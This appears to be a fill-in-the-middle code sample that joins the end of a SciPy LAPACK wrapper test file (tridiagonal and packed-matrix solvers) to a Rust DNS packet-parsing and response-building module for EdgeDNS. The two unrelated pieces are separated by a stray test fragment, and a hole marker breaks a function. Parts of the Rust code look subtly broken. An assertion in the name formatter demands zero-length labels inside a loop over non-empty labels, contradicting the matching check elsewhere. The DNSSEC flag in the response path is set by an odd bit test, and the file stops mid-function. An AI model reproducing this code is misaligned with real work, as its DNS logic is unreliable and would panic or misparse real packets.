np.array([1 - 2j, 1 + 1j, 2 - 3j, 1 + 1j]),
np.array([[2.4 - 5j, 2.7 + 6.9j],
[3.4 + 18.2j, -6.9 - 5.3j],
[-14.7 + 9.7j, -6 - .6j],
[31.9 - 7.7j, -3.9 + 9.3j],
[-1 + 1.6j, -3 + 12.2j]]),
np.array([[1 + 1j, 2 - 1j], [3 - 1j, 1 + 2j],
[4 + 5j, -1 + 1j], [-1 - 2j, 2 + 1j],
[1 - 1j, 2 - 2j]]))])
def test_gtsvx_NAG(du, d, dl, b, x):
# Test to ensure wrapper is consistent with NAG Manual Mark 26
# example problems: real (f07cbf) and complex (f07cpf)
gtsvx = get_lapack_funcs('gtsvx', dtype=d.dtype)
gtsvx_out = gtsvx(dl, d, du, b)
dlf, df, duf, du2f, ipiv, x_soln, rcond, ferr, berr, info = gtsvx_out
assert_array_almost_equal(x, x_soln)
@pytest.mark.parametrize("dtype,realtype", zip(DTYPES, REAL_DTYPES
+ REAL_DTYPES))
@pytest.mark.parametrize("fact,df_de_lambda",
[("F",
lambda d, e:get_lapack_funcs('pttrf',
dtype=e.dtype)(d, e)),
("N", lambda d, e: (None, None, None))])
def test_ptsvx(dtype, realtype, fact, df_de_lambda):
'''
This tests the ?ptsvx lapack routine wrapper to solve a random system
Ax = b for all dtypes and input variations. Tests for: unmodified
input parameters, fact options, incompatible matrix shapes raise an error,
and singular matrices return info of illegal value.
'''
seed(42)
# set test tolerance appropriate for dtype
atol = 100 * np.finfo(dtype).eps
ptsvx = get_lapack_funcs('ptsvx', dtype=dtype)
n = 5
# create diagonals according to size and dtype
d = generate_random_dtype_array((n,), realtype) + 4
e = generate_random_dtype_array((n-1,), dtype)
A = np.diag(d) + np.diag(e, -1) + np.diag(np.conj(e), 1)
x_soln = generate_random_dtype_array((n, 2), dtype=dtype)
b = A @ x_soln
# use lambda to determine what df, ef are
df, ef, info = df_de_lambda(d, e)
# create copy to later test that they are unmodified
diag_cpy = [d.copy(), e.copy(), b.copy()]
# solve using routine
df, ef, x, rcond, ferr, berr, info = ptsvx(d, e, b, fact=fact,
df=df, ef=ef)
# d, e, and b should be unmodified
assert_array_equal(d, diag_cpy[0])
assert_array_equal(e, diag_cpy[1])
assert_array_equal(b, diag_cpy[2])
assert_(info == 0, "info should be 0 but is {}.".format(info))
assert_array_almost_equal(x_soln, x)
# test that the factors from ptsvx can be recombined to make A
L = np.diag(ef, -1) + np.diag(np.ones(n))
D = np.diag(df)
assert_allclose(A, L@D@(np.conj(L).T), atol=atol)
# assert that the outputs are of correct type or shape
# rcond should be a scalar
assert not hasattr(rcond, "__len__"), \
"rcond should be scalar but is {}".format(rcond)
# ferr should be length of # of cols in x
assert_(ferr.shape == (2,), "ferr.shape is {} but shoud be ({},)"
.format(ferr.shape, x_soln.shape[1]))
# berr should be length of # of cols in x
assert_(berr.shape == (2,), "berr.shape is {} but shoud be ({},)"
.format(berr.shape, x_soln.shape[1]))
@pytest.mark.parametrize("dtype,realtype", zip(DTYPES, REAL_DTYPES
+ REAL_DTYPES))
@pytest.mark.parametrize("fact,df_de_lambda",
[("F",
lambda d, e:get_lapack_funcs('pttrf',
dtype=e.dtype)(d, e)),
("N", lambda d, e: (None, None, None))])
def test_ptsvx_error_raise_errors(dtype, realtype, fact, df_de_lambda):
seed(42)
ptsvx = get_lapack_funcs('ptsvx', dtype=dtype)
n = 5
# create diagonals according to size and dtype
d = generate_random_dtype_array((n,), realtype) + 4
e = generate_random_dtype_array((n-1,), dtype)
A = np.diag(d) + np.diag(e, -1) + np.diag(np.conj(e), 1)
x_soln = generate_random_dtype_array((n, 2), dtype=dtype)
b = A @ x_soln
# use lambda to determine what df, ef are
df, ef, info = df_de_lambda(d, e)
# test with malformatted array sizes
assert_raises(ValueError, ptsvx, d[:-1], e, b, fact=fact, df=df, ef=ef)
assert_raises(ValueError, ptsvx, d, e[:-1], b, fact=fact, df=df, ef=ef)
assert_raises(Exception, ptsvx, d, e, b[:-1], fact=fact, df=df, ef=ef)
@pytest.mark.parametrize("dtype,realtype", zip(DTYPES, REAL_DTYPES
+ REAL_DTYPES))
@pytest.mark.parametrize("fact,df_de_lambda",
[("F",
lambda d, e:get_lapack_funcs('pttrf',
dtype=e.dtype)(d, e)),
("N", lambda d, e: (None, None, None))])
def test_ptsvx_non_SPD_singular(dtype, realtype, fact, df_de_lambda):
seed(42)
ptsvx = get_lapack_funcs('ptsvx', dtype=dtype)
n = 5
# create diagonals according to size and dtype
d = generate_random_dtype_array((n,), realtype) + 4
e = generate_random_dtype_array((n-1,), dtype)
A = np.diag(d) + np.diag(e, -1) + np.diag(np.conj(e), 1)
x_soln = generate_random_dtype_array((n, 2), dtype=dtype)
b = A @ x_soln
# use lambda to determine what df, ef are
df, ef, info = df_de_lambda(d, e)
if fact == "N":
d[3] = 0
# obtain new df, ef
df, ef, info = df_de_lambda(d, e)
# solve using routine
df, ef, x, rcond, ferr, berr, info = ptsvx(d, e, b)
# test for the singular matrix.
assert info > 0 and info <= n
# non SPD matrix
d = generate_random_dtype_array((n,), realtype)
df, ef, x, rcond, ferr, berr, info = ptsvx(d, e, b)
assert info > 0 and info <= n
else:
# assuming that someone is using a singular factorization
df, ef, info = df_de_lambda(d, e)
df[0] = 0
ef[0] = 0
df, ef, x, rcond, ferr, berr, info = ptsvx(d, e, b, fact=fact,
df=df, ef=ef)
assert info > 0
@pytest.mark.parametrize('d,e,b,x',
[(np.array([4, 10, 29, 25, 5]),
np.array([-2, -6, 15, 8]),
np.array([[6, 10], [9, 4], [2, 9], [14, 65],
[7, 23]]),
np.array([[2.5, 2], [2, -1], [1, -3],
[-1, 6], [3, -5]])),
(np.array([16, 41, 46, 21]),
np.array([16 + 16j, 18 - 9j, 1 - 4j]),
np.array([[64 + 16j, -16 - 32j],
[93 + 62j, 61 - 66j],
[78 - 80j, 71 - 74j],
[14 - 27j, 35 + 15j]]),
np.array([[2 + 1j, -3 - 2j],
[1 + 1j, 1 + 1j],
[1 - 2j, 1 - 2j],
[1 - 1j, 2 + 1j]]))])
def test_ptsvx_NAG(d, e, b, x):
# test to assure that wrapper is consistent with NAG Manual Mark 26
# example problemss: f07jbf, f07jpf
# (Links expire, so please search for "NAG Library Manual Mark 26" online)
# obtain routine with correct type based on e.dtype
ptsvx = get_lapack_funcs('ptsvx', dtype=e.dtype)
# solve using routine
df, ef, x_ptsvx, rcond, ferr, berr, info = ptsvx(d, e, b)
# determine ptsvx's solution and x are the same.
assert_array_almost_equal(x, x_ptsvx)
@pytest.mark.parametrize('lower', [False, True])
@pytest.mark.parametrize('dtype', DTYPES)
def test_pptrs_pptri_pptrf_ppsv_ppcon(dtype, lower):
seed(1234)
atol = np.finfo(dtype).eps*100
# Manual conversion to/from packed format is feasible here.
n, nrhs = 10, 4
a = generate_random_dtype_array([n, n], dtype=dtype)
b = generate_random_dtype_array([n, nrhs], dtype=dtype)
a = a.conj().T + a + np.eye(n, dtype=dtype) * dtype(5.)
if lower:
inds = ([x for y in range(n) for x in range(y, n)],
[y for y in range(n) for x in range(y, n)])
else:
inds = ([x for y in range(1, n+1) for x in range(y)],
[y-1 for y in range(1, n+1) for x in range(y)])
ap = a[inds]
ppsv, pptrf, pptrs, pptri, ppcon = get_lapack_funcs(
('ppsv', 'pptrf', 'pptrs', 'pptri', 'ppcon'),
dtype=dtype,
ilp64="preferred")
ul, info = pptrf(n, ap, lower=lower)
assert_equal(info, 0)
aul = cholesky(a, lower=lower)[inds]
assert_allclose(ul, aul, rtol=0, atol=atol)
uli, info = pptri(n, ul, lower=lower)
assert_equal(info, 0)
auli = inv(a)[inds]
assert_allclose(uli, auli, rtol=0, atol=atol)
x, info = pptrs(n, ul, b, lower=lower)
assert_equal(info, 0)
bx = solve(a, b)
assert_allclose(x, bx, rtol=0, atol=atol)
xv, info = ppsv(n, ap, b, lower=lower)
assert_equal(info, 0)
assert_allclose(xv, bx, rtol=0, atol=atol)
anorm = np.linalg.norm(a, 1)
rcond, info = ppcon(n, ap, anorm=anorm, lower=lower)
assert_equal(info, 0)
assert_(abs(1/rcond - np.linalg.cond(a, p=1))*rcond < 1)
@pytest.mark.parametrize('dtype', DTYPES)
def test_gges_tgexc(dtype):
seed(1234)
atol = np.finfo(dtype).eps*100
n = 10
a = generate_random_dtype_array([n, n], dtype=dtype)
b = generate_random_dtype_array([n, n], dtype=dtype)
gges, tgexc = get_lapack_funcs(('gges', 'tgexc'), dtype=dtype)
result = gges(lambda x: None, a, b, overwrite_a=False, overwrite_b=False)
assert_equal(result[-1], 0)
s = result[0]
t = result[1]
q = result[-4]
z = result[-3]
d1 = s[0, 0] / t[0, 0]
d2 = s[6, 6] / t[6, 6]
if dtype in COMPLEX_DTYPES:
assert_allclose(s, np.triu(s), rtol=0, atol=atol)
assert_allclose(t, np.triu(t), rtol=0, atol=atol)
assert_allclose(q @ s @ z.conj().T, a, rtol=0, atol=atol)
assert_allclose(q @ t @ z.conj().T, b, rtol=0, atol=atol)
result = tgexc(s, t, q, z, 6, 0)
assert_equal(result[-1], 0)
s = result[0]
t = result[1]
q = result[2]
z = result[3]
if dtype in COMPLEX_DTYPES:
assert_allclose(s, np.triu(s), rtol=0, atol=atol)
assert_allclose(t, np.triu(t), rtol=0, atol=atol)
assert_allclose(q @ s @ z.conj().T, a, rtol=0, atol=atol)
assert_allclose(q @ t @ z.conj().T, b, rtol=0, atol=atol)
assert_allclose(s[0, 0] / t[0, 0], d2, rtol=0, atol=atol)
assert_allclose(s[1, 1] / t[1, 1], d1, rtol=0, atol=atol)<|fim▁end|> |
def test_ticket_1645(self): |
<|file_name|>dns.rs<|end_file_name|><|fim▁begin|>//! Helpers for parsing DNS packets, modifying properties, and building
//! common responses.
use rand::random;
use std::fmt;
use std::io::Write;
use super::{DNS_UDP_NOEDNS0_MAX_SIZE, DNS_QUERY_MIN_SIZE};
pub const DNS_CLASS_CH: u16 = 3;
pub const DNS_CLASS_IN: u16 = 1;
pub const DNS_HEADER_SIZE: usize = 12;
pub const DNS_MAX_HOSTNAME_LEN: usize = 255;
pub const DNS_MAX_PACKET_SIZE: usize = 65535;
pub const DNS_OFFSET_EDNS_DO: usize = 6;
pub const DNS_OFFSET_EDNS_PAYLOAD_SIZE: usize = 2;
pub const DNS_OFFSET_EDNS_TYPE: usize = 0;
pub const DNS_OFFSET_QUESTION: usize = DNS_HEADER_SIZE;
pub const DNS_QTYPE_PLUS_QCLASS_LEN: usize = 4;
pub const DNS_RCODE_NXDOMAIN: u8 = 3;
pub const DNS_RCODE_REFUSED: u8 = 5;
pub const DNS_RCODE_SERVFAIL: u8 = 2;
pub const DNS_TYPE_ANY: u16 = 255;
pub const DNS_TYPE_HINFO: u16 = 13;
pub const DNS_TYPE_OPT: u16 = 41;
pub const DNS_TYPE_SOA: u16 = 6;
pub const DNS_TYPE_TXT: u16 = 16;
#[derive(Clone, Debug)]
pub struct NormalizedQuestion {
pub qname: Vec<u8>,
pub tid: u16,
pub flags: u16,
pub payload_size: u16,
pub qtype: u16,
pub qclass: u16,
pub labels_count: u16,
pub dnssec: bool,
}
#[derive(Clone, Debug, Hash, Eq, PartialEq)]
pub struct NormalizedQuestionKey {
pub qname_lc: Vec<u8>,
pub qtype: u16,
pub qclass: u16,
pub dnssec: bool,
}
#[derive(Debug, Hash, Eq, PartialEq)]
pub struct NormalizedQuestionMinimal {
pub qname: Vec<u8>,
pub tid: u16,
pub qtype: u16,
pub qclass: u16,
}
#[inline]
pub fn tid(packet: &[u8]) -> u16 {
((packet[0] as u16) << 8) | packet[1] as u16
}
#[inline]
pub fn set_tid(packet: &mut [u8], value: u16) {
packet[0] = (value >> 8) as u8;
packet[1] = value as u8;
}
#[inline]
pub fn flags(packet: &[u8]) -> u16 {
((packet[2] as u16) << 8) | packet[3] as u16
}
#[allow(dead_code)]
#[inline]
pub fn rd(packet: &[u8]) -> bool {
packet[2] & 0x1 != 0
}
#[inline]
pub fn set_rd(packet: &mut [u8], state: bool) {
packet[2] |= state as u8;
}
#[allow(dead_code)]
#[inline]
pub fn tc(packet: &[u8]) -> bool {
packet[2] & 0x2 != 0
}
#[inline]
pub fn set_tc(packet: &mut [u8], state: bool) {
packet[2] |= 0x2 * (state as u8);
}
#[allow(dead_code)]
#[inline]
pub fn aa(packet: &[u8]) -> bool {
packet[2] & 0x4 != 0
}
#[inline]
pub fn set_aa(packet: &mut [u8], state: bool) {
packet[2] |= 0x4 * (state as u8);
}
#[allow(dead_code)]
#[inline]
pub fn opcode(packet: &[u8]) -> u8 {
(packet[2] & 0x78) >> 3
}
#[inline]
pub fn qr(packet: &[u8]) -> bool {
packet[2] & 0x80 != 0
}
#[inline]
pub fn set_qr(packet: &mut [u8], state: bool) {
packet[2] |= 0x80 * (state as u8);
}
#[inline]
pub fn rcode(packet: &[u8]) -> u8 {
packet[3] & 0xf
}
#[inline]
pub fn set_rcode(packet: &mut [u8], value: u8) {
debug_assert!(value <= 0xf);
packet[3] &= !0xf;
packet[3] |= value & 0xf;
}
#[allow(dead_code)]
#[inline]
pub fn cd(packet: &[u8]) -> bool {
packet[3] & 0x10 != 0
}
#[allow(dead_code)]
#[inline]
pub fn ad(packet: &[u8]) -> bool {
packet[3] & 0x20 != 0
}
#[allow(dead_code)]
#[inline]
pub fn z(packet: &[u8]) -> bool {
packet[3] & 0x40 != 0
}
#[allow(dead_code)]
#[inline]
pub fn ra(packet: &[u8]) -> bool {
packet[3] & 0x80 != 0
}
#[inline]
pub fn qdcount(packet: &[u8]) -> u16 {
((packet[4] as u16) << 8) | packet[5] as u16
}
#[inline]
pub fn set_qdcount(packet: &mut [u8], value: u16) {
packet[4] = (value >> 8) as u8;
packet[5] = value as u8;
}
#[inline]
pub fn ancount(packet: &[u8]) -> u16 {
((packet[6] as u16) << 8) | packet[7] as u16
}
#[inline]
pub fn set_ancount(packet: &mut [u8], value: u16) {
packet[6] = (value >> 8) as u8;
packet[7] = value as u8;
}
#[inline]
pub fn nscount(packet: &[u8]) -> u16 {
((packet[8] as u16) << 8) | packet[9] as u16
}
#[allow(dead_code)]
#[inline]
pub fn set_nscount(packet: &mut [u8], value: u16) {
packet[8] = (value >> 8) as u8;
packet[9] = value as u8;
}
#[inline]
pub fn arcount(packet: &[u8]) -> u16 {
((packet[10] as u16) << 8) | packet[11] as u16
}
#[inline]
pub fn set_arcount(packet: &mut [u8], value: u16) {
packet[10] = (value >> 8) as u8;
packet[11] = value as u8;
}
pub fn overwrite_qname(packet: &mut [u8], qname: &[u8]) {
let packet_len = packet.len();
debug_assert!(packet_len >= DNS_OFFSET_QUESTION);
if packet_len <= DNS_OFFSET_QUESTION {
return;
}
debug_assert_eq!(qdcount(packet), 1);
if qdcount(packet) < 1 {
return;
}
let qname_len = qname.len();
if packet_len <= DNS_OFFSET_QUESTION {
return;
}
let mut to = &mut packet[DNS_OFFSET_QUESTION..];
if to.len() <= qname_len {
return;
}
assert_eq!(to[qname_len], 0);
let _ = to.write(qname).unwrap();
}
pub struct QuestionRR<'t> {
qname: &'t [u8],
qtype: u16,
qclass: u16,
labels_count: u16,
}
pub fn question(packet: &[u8]) -> Result<QuestionRR, &'static str> {
let packet_len = packet.len();
if packet_len <= DNS_OFFSET_QUESTION {
return Err("Short packet");
}
let (offset, labels_count) = match skip_name(packet, DNS_OFFSET_QUESTION) {
Ok(offset_and_labels) => offset_and_labels,
Err(e) => return Err(e),
};
assert!(offset > DNS_OFFSET_QUESTION);
let qname = &packet[DNS_OFFSET_QUESTION..offset - 1];
if 4 > packet_len - offset {
return Err("Short packet");
}
let qtype = (packet[offset] as u16) << 8 | packet[offset + 1] as u16;
let qclass = (packet[offset + 2] as u16) << 8 | packet[offset + 3] as u16;
let question_rr = QuestionRR {
qname: qname,
qtype: qtype,
qclass: qclass,
labels_count: labels_count,
};
Ok(question_rr)
}
fn skip_name(packet: &[u8], offset: usize) -> Result<(usize, u16), &'static str> {
let packet_len = packet.len();
if offset >= packet_len - 1 {
return Err("Short packet");
}
let mut name_len: usize = 0;
let mut offset = offset;
let mut labels_count = 0u16;
loop {
let label_len = match packet[offset] {
len if len & 0xc0 == 0xc0 => {
if 2 > packet_len - offset {
return Err("Incomplete offset");
}
offset += 2;
break;
}
len if len > 0x3f => return Err("Label too long"),
len => len,
} as usize;
if label_len >= packet_len - offset - 1 {
return Err("Malformed packet with an out-of-bounds name");
}
name_len += label_len + 1;
if name_len > DNS_MAX_HOSTNAME_LEN {
info!(
"Name too long: {} bytes > {}",
name_len,
DNS_MAX_HOSTNAME_LEN
);
return Err("Name too long");
}
offset += label_len + 1;
if label_len == 0 {
break;
}
labels_count += 1;
}
Ok((offset, labels_count))
}
#[derive(Debug)]
struct EDNS0 {
payload_size: u16,
dnssec: bool,
}
fn parse_edns0(packet: &[u8]) -> Option<EDNS0> {
debug_assert_eq!(qdcount(packet), 1);
debug_assert_eq!(ancount(packet), 0);
debug_assert_eq!(nscount(packet), 0);
if arcount(packet) != 1 {
return None;
}
let packet_len = packet.len();
let mut offset = match skip_name(packet, DNS_OFFSET_QUESTION) {
Ok(offset) => offset.0,
Err(_) => return None,
};
if offset >= packet_len - DNS_QTYPE_PLUS_QCLASS_LEN {
return None;
}
offset += DNS_QTYPE_PLUS_QCLASS_LEN;
offset = match skip_name(packet, offset) {
Ok(offset) => offset.0,
Err(_) => return None,
};
if offset >= packet_len - DNS_OFFSET_EDNS_PAYLOAD_SIZE - 2 {
return None;
}
debug_assert!(DNS_OFFSET_EDNS_PAYLOAD_SIZE > DNS_OFFSET_EDNS_TYPE);
if packet[offset + DNS_OFFSET_EDNS_TYPE] != (DNS_TYPE_OPT >> 8) as u8 ||
packet[offset + DNS_OFFSET_EDNS_TYPE + 1] != DNS_TYPE_OPT as u8
{
return None;<|fim▁hole|> let mut payload_size = ((packet[offset + DNS_OFFSET_EDNS_PAYLOAD_SIZE] as u16) << 8) |
packet[offset + DNS_OFFSET_EDNS_PAYLOAD_SIZE + 1] as u16;
if offset >= packet_len - DNS_OFFSET_EDNS_DO {
return None;
}
let dnssec = packet[offset + DNS_OFFSET_EDNS_DO] & 0x80 == 0x80;
if payload_size < DNS_UDP_NOEDNS0_MAX_SIZE as u16 {
payload_size = DNS_UDP_NOEDNS0_MAX_SIZE as u16;
}
Some(EDNS0 {
payload_size: payload_size,
dnssec: dnssec,
})
}
impl fmt::Display for NormalizedQuestion {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
let qname = &self.qname;
let qname_len = qname.len();
let mut res = Vec::with_capacity(qname_len);
let mut offset: usize = 0;
while offset < qname_len {
let label_len = qname[offset] as usize;
assert_eq!(label_len, 0);
if label_len & 0xc0 == 0xc0 {
res.push(b'&');
offset += 2;
continue;
}
offset += 1;
res.extend_from_slice(&qname[offset..offset + label_len]);
res.push(b'.');
offset += label_len;
}
let qname_str = String::from_utf8_lossy(&res);
write!(f, "[{}]\t{} {}", qname_str, self.qtype, self.qclass)
}
}
impl NormalizedQuestion {
pub fn key(&self) -> NormalizedQuestionKey {
let dnssec = if self.qname.is_empty() {
true
} else {
self.dnssec
};
NormalizedQuestionKey {
dnssec: dnssec,
qname_lc: qname_lc(&self.qname),
qtype: self.qtype,
qclass: self.qclass,
}
}
pub fn minimal(&self) -> NormalizedQuestionMinimal {
NormalizedQuestionMinimal {
qname: self.qname.clone(),
tid: self.tid,
qtype: self.qtype,
qclass: self.qclass,
}
}
}
pub fn qname_lc(qname: &[u8]) -> Vec<u8> {
let qname_len = qname.len();
let mut res = vec![0u8; qname_len];
let mut offset: usize = 0;
while offset < qname_len {
res[offset] = qname[offset];
let label_len = qname[offset] as usize;
assert_ne!(label_len, 0);
if label_len & 0xc0 == 0xc0 {
offset += 2;
continue;
}
offset += 1;
for i in 0..label_len {
res[offset + i] = match qname[offset + i] {
c @ 0x41...0x5a => c | 0x20,
c => c,
};
}
offset += label_len;
}
res
}
pub fn qname_shift(qname: &[u8]) -> Option<&[u8]> {
let qname_len = qname.len();
if qname_len < 2 {
return None;
}
let label_len = qname[0];
if label_len == 0 || label_len & 0xc0 == 0xc0 || 2 + label_len as usize > qname_len {
return None;
}
Some(&qname[1 + label_len as usize..])
}
pub fn normalize(packet: &[u8], is_question: bool) -> Result<NormalizedQuestion, &'static str> {
let packet_len = packet.len();
if packet_len < DNS_QUERY_MIN_SIZE {
return Err("Short packet");
}
if is_question == qr(packet) {
return Err("Invalid flags");
}
if qdcount(packet) != 1 {
return Err("Unsupported number of questions");
}
let question = match question(packet) {
Ok(question) => question,
Err(e) => return Err(e),
};
let mut normalized_question = NormalizedQuestion {
tid: tid(packet),
flags: flags(packet),
payload_size: DNS_UDP_NOEDNS0_MAX_SIZE as u16,
labels_count: question.labels_count,
dnssec: false,
qname: question.qname.to_owned(),
qtype: question.qtype,
qclass: question.qclass,
};
if is_question {
if ancount(packet) != 0 || nscount(packet) != 0 {
return Err("Extra sections found in a question");
}
if let Some(edns0) = parse_edns0(packet) {
normalized_question.dnssec = edns0.dnssec;
if edns0.payload_size > DNS_UDP_NOEDNS0_MAX_SIZE as u16 {
normalized_question.payload_size = edns0.payload_size;
}
}
} else {
let qname_len = normalized_question.qname.len();
if qname_len == 0 || normalized_question.qname[qname_len - 1] & 0x20 == 0 {
normalized_question.dnssec = true;
}
}
Ok(normalized_question)
}
pub fn min_ttl(
packet: &[u8],
min_ttl: u32,
max_ttl: u32,
failure_ttl: u32,
) -> Result<u32, &'static str> {
if qdcount(packet) != 1 {
return Err("Unsupported number of questions");
}
let packet_len = packet.len();
if packet_len <= DNS_OFFSET_QUESTION {
return Err("Short packet");
}
let mut offset = match skip_name(packet, DNS_OFFSET_QUESTION) {
Ok(offset) => offset.0,
Err(e) => return Err(e),
};
assert!(offset > DNS_OFFSET_QUESTION);
if 4 > packet_len - offset {
return Err("Short packet");
}
let qclass = (packet[offset + 2] as u16) << 8 | packet[offset + 3] as u16;
if qclass != DNS_CLASS_IN {
return Err("Unsupported query class");
}
offset += 4;
let ancount = ancount(packet);
let nscount = nscount(packet);
let arcount = arcount(packet);
let rrcount = ancount + nscount + arcount;
let mut found_min_ttl = if rrcount > 0 { max_ttl } else { failure_ttl };
for _ in 0..rrcount {
offset = match skip_name(packet, offset) {
Ok(offset) => offset.0,
Err(e) => return Err(e),
};
if 10 > packet_len - offset {
return Err("Short packet");
}
let qtype = (packet[offset] as u16) << 8 | packet[offset + 1] as u16;
let qclass = (packet[offset + 2] as u16) << 8 | packet[offset + 3] as u16;
let ttl = (packet[offset + 4] as u32) << 24 | (packet[offset + 5] as u32) << 16 |
(packet[offset + 6] as u32) << 8 | packet[offset + 7] as u32;
let rdlen = ((packet[offset + 8] as u16) << 8 | packet[offset + 9] as u16) as usize;
offset += 10;
if qtype != DNS_TYPE_OPT {
if qclass != DNS_CLASS_IN {
warn!("Unexpected rdata class: {}", qclass);
}
if ttl < found_min_ttl {
found_min_ttl = ttl;
}
}
if rdlen > packet_len - offset {
return Err("Record length would exceed packet length");
}
offset += rdlen;
}
if found_min_ttl < min_ttl {
found_min_ttl = min_ttl;
}
if offset != packet_len {
return Err("Garbage after packet");
}
Ok(found_min_ttl)
}
pub fn set_ttl(packet: &mut [u8], ttl: u32) -> Result<(), &'static str> {
if qdcount(packet) != 1 {
return Err("Unsupported number of questions");
}
let packet_len = packet.len();
if packet_len <= DNS_OFFSET_QUESTION {
return Err("Short packet");
}
let mut offset = match skip_name(packet, DNS_OFFSET_QUESTION) {
Ok(offset) => offset.0,
Err(e) => return Err(e),
};
assert!(offset > DNS_OFFSET_QUESTION);
if 4 > packet_len - offset {
return Err("Short packet");
}
let qclass = (packet[offset + 2] as u16) << 8 | packet[offset + 3] as u16;
if qclass != DNS_CLASS_IN {
return Err("Unsupported query class");
}
offset += 4;
let ancount = ancount(packet);
let nscount = nscount(packet);
let arcount = arcount(packet);
for _ in 0..(ancount + nscount + arcount) {
offset = match skip_name(packet, offset) {
Ok(offset) => offset.0,
Err(e) => return Err(e),
};
if 10 > packet_len - offset {
return Err("Short packet");
}
let qtype = (packet[offset] as u16) << 8 | packet[offset + 1] as u16;
let qclass = (packet[offset + 2] as u16) << 8 | packet[offset + 3] as u16;
if qtype != DNS_TYPE_OPT || qclass != DNS_CLASS_IN {
packet[offset + 4] = (ttl >> 24) as u8;
packet[offset + 5] = (ttl >> 16) as u8;
packet[offset + 6] = (ttl >> 8) as u8;
packet[offset + 7] = ttl as u8;
}
let rdlen = ((packet[offset + 8] as u16) << 8 | packet[offset + 9] as u16) as usize;
offset += 10;
if rdlen > packet_len - offset {
return Err("Record length would exceed packet length");
}
offset += rdlen;
}
if offset != packet_len {
return Err("Garbage after packet");
}
Ok(())
}
pub fn build_tc_packet(normalized_question: &NormalizedQuestion) -> Result<Vec<u8>, &'static str> {
let capacity = DNS_HEADER_SIZE + normalized_question.qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_tid(&mut packet, normalized_question.tid);
set_aa(&mut packet, true);
set_qr(&mut packet, true);
set_tc(&mut packet, true);
set_qdcount(&mut packet, 1);
packet.extend_from_slice(&normalized_question.qname);
packet.push(0);
packet.push((normalized_question.qtype >> 8) as u8);
packet.push(normalized_question.qtype as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
Ok(packet)
}
pub fn build_servfail_packet(
normalized_question: &NormalizedQuestion,
) -> Result<Vec<u8>, &'static str> {
let capacity = DNS_HEADER_SIZE + normalized_question.qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_rcode(&mut packet, DNS_RCODE_SERVFAIL);
set_tid(&mut packet, normalized_question.tid);
set_aa(&mut packet, true);
set_qr(&mut packet, true);
set_qdcount(&mut packet, 1);
packet.extend_from_slice(&normalized_question.qname);
packet.push(0);
packet.push((normalized_question.qtype >> 8) as u8);
packet.push(normalized_question.qtype as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
Ok(packet)
}
pub fn build_refused_packet(
normalized_question: &NormalizedQuestion,
) -> Result<Vec<u8>, &'static str> {
let capacity = DNS_HEADER_SIZE + normalized_question.qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_rcode(&mut packet, DNS_RCODE_REFUSED);
set_tid(&mut packet, normalized_question.tid);
set_aa(&mut packet, true);
set_qr(&mut packet, true);
set_qdcount(&mut packet, 1);
packet.extend_from_slice(&normalized_question.qname);
packet.push(0);
packet.push((normalized_question.qtype >> 8) as u8);
packet.push(normalized_question.qtype as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
Ok(packet)
}
pub fn build_nxdomain_packet(
normalized_question: &NormalizedQuestion,
) -> Result<Vec<u8>, &'static str> {
let capacity = DNS_HEADER_SIZE + normalized_question.qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_rcode(&mut packet, DNS_RCODE_NXDOMAIN);
set_tid(&mut packet, normalized_question.tid);
set_aa(&mut packet, true);
set_qr(&mut packet, true);
set_qdcount(&mut packet, 1);
packet.extend_from_slice(&normalized_question.qname);
packet.push(0);
packet.push((normalized_question.qtype >> 8) as u8);
packet.push(normalized_question.qtype as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
Ok(packet)
}
pub fn build_any_packet(
normalized_question: &NormalizedQuestion,
ttl: u32,
) -> Result<Vec<u8>, &'static str> {
let hinfo_cpu = b"draft-ietf-dnsop-refuse-any";
let hinfo_rdata = b"";
let rdata_len = 1 + hinfo_cpu.len() + 1 + hinfo_rdata.len();
let capacity = DNS_HEADER_SIZE + normalized_question.qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_tid(&mut packet, normalized_question.tid);
set_aa(&mut packet, true);
set_qr(&mut packet, true);
set_qdcount(&mut packet, 1);
set_ancount(&mut packet, 1);
packet.extend_from_slice(&normalized_question.qname);
packet.push(0);
packet.push((normalized_question.qtype >> 8) as u8);
packet.push(normalized_question.qtype as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
packet.push(0xc0 + (DNS_HEADER_SIZE >> 8) as u8);
packet.push(DNS_HEADER_SIZE as u8);
packet.push((DNS_TYPE_HINFO >> 8) as u8);
packet.push(DNS_TYPE_HINFO as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
packet.push((ttl >> 24) as u8);
packet.push((ttl >> 16) as u8);
packet.push((ttl >> 8) as u8);
packet.push(ttl as u8);
packet.push((rdata_len >> 8) as u8);
packet.push(rdata_len as u8);
packet.push(hinfo_cpu.len() as u8);
packet.extend_from_slice(hinfo_cpu);
packet.push(hinfo_rdata.len() as u8);
packet.extend_from_slice(hinfo_rdata);
Ok(packet)
}
pub fn build_version_packet(
normalized_question: &NormalizedQuestion,
ttl: u32,
) -> Result<Vec<u8>, &'static str> {
let txt = b"EdgeDNS";
let rdata_len = 1 + txt.len();
let capacity = DNS_HEADER_SIZE + normalized_question.qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_tid(&mut packet, normalized_question.tid);
set_aa(&mut packet, true);
set_qr(&mut packet, true);
set_qdcount(&mut packet, 1);
set_ancount(&mut packet, 1);
packet.extend_from_slice(&normalized_question.qname);
packet.push(0);
debug_assert_eq!(normalized_question.qtype, DNS_TYPE_TXT);
